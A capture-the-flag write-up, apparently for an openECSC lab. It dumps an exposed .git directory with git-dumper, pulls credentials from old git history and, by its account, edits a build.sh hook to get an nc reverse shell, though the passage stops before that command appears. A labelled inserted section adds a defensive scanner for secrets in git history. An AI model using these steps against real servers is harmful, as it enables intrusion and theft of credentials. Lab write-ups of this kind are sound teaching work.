Extract the repo with git-dumper (https://github.com/arthaud/git-dumper)
Find the credentials in the git history of an old branch
Write to the repo with the extracted creds and get code execution
With gobuster, we found that there is a .git directory on the server.
Then we installed git-dumper with pip3 install git-dumper
Then extracted the repo with:
~/.local/bin/git-dumper https://ea439dee-8c4d-4ead-aa86-40a208094d02.idocker.vuln.land//website-repo/.git ~/Documents/openecsc/repo_dump
There was nothing too interesting in the files.
With GitKraken we did some further exploration and found an old version of the README.md which had credentials in it:
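A defender-side check for the issue described above, as an added example that is not part of the original writeup: it scans `git log -p --all` output so that credentials committed and later deleted on any branch are still reported. The keyword regex, the function names and the sample log are constructed for illustration.

```python
import re
import subprocess

# Illustrative keyword list (an assumption, not a complete secret ruleset).
SECRET_RE = re.compile(
    r"(?i)\b(pass(?:word|wd)?|pwd|secret|token|api[_-]?key)\b\s*[:=]\s*\S")

def scan_patch_log(log_text):
    """Return (commit, path, '+' or '-', keyword) for every added or removed
    line in `git log -p` output that looks like a credential assignment."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:8]
        elif line.startswith(("--- ", "+++ ")):
            name = line[4:]
            if name != "/dev/null":          # keep the old path for deleted files
                path = name[2:] if name[:2] in ("a/", "b/") else name
        elif line.startswith(("+", "-")):
            m = SECRET_RE.search(line[1:])
            if m:                            # report the keyword, never the value
                findings.append((commit, path, line[0], m.group(1).lower()))
    return findings

def scan_repo(repo_dir):
    """Scan every ref (--all), so old branches are covered too."""
    cmd = ["git", "-C", repo_dir, "log", "-p", "--all", "--no-color"]
    out = subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
    return scan_patch_log(out)

# Constructed sample, newest commit first, as git log prints it.
SAMPLE_LOG = """\
commit 2222222222222222222222222222222222222222
    Remove creds from README
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -2,1 +1,0 @@
-Password: CONSTRUCTED-not-a-real-secret
commit 1111111111111111111111111111111111111111
    Add deployment notes
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1,0 +2,1 @@
+Password: CONSTRUCTED-not-a-real-secret
"""

if __name__ == "__main__":
    for finding in scan_patch_log(SAMPLE_LOG):
        print(*finding)
```

Running `scan_repo` on a checkout before it is deployed shows what anyone who can read the `.git` directory would also find; a credential that turns up this way has to be rotated, since deleting it in a later commit leaves it in history.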
As the build.sh gets executed on each push, we modified it to get us a nc reverse shell back: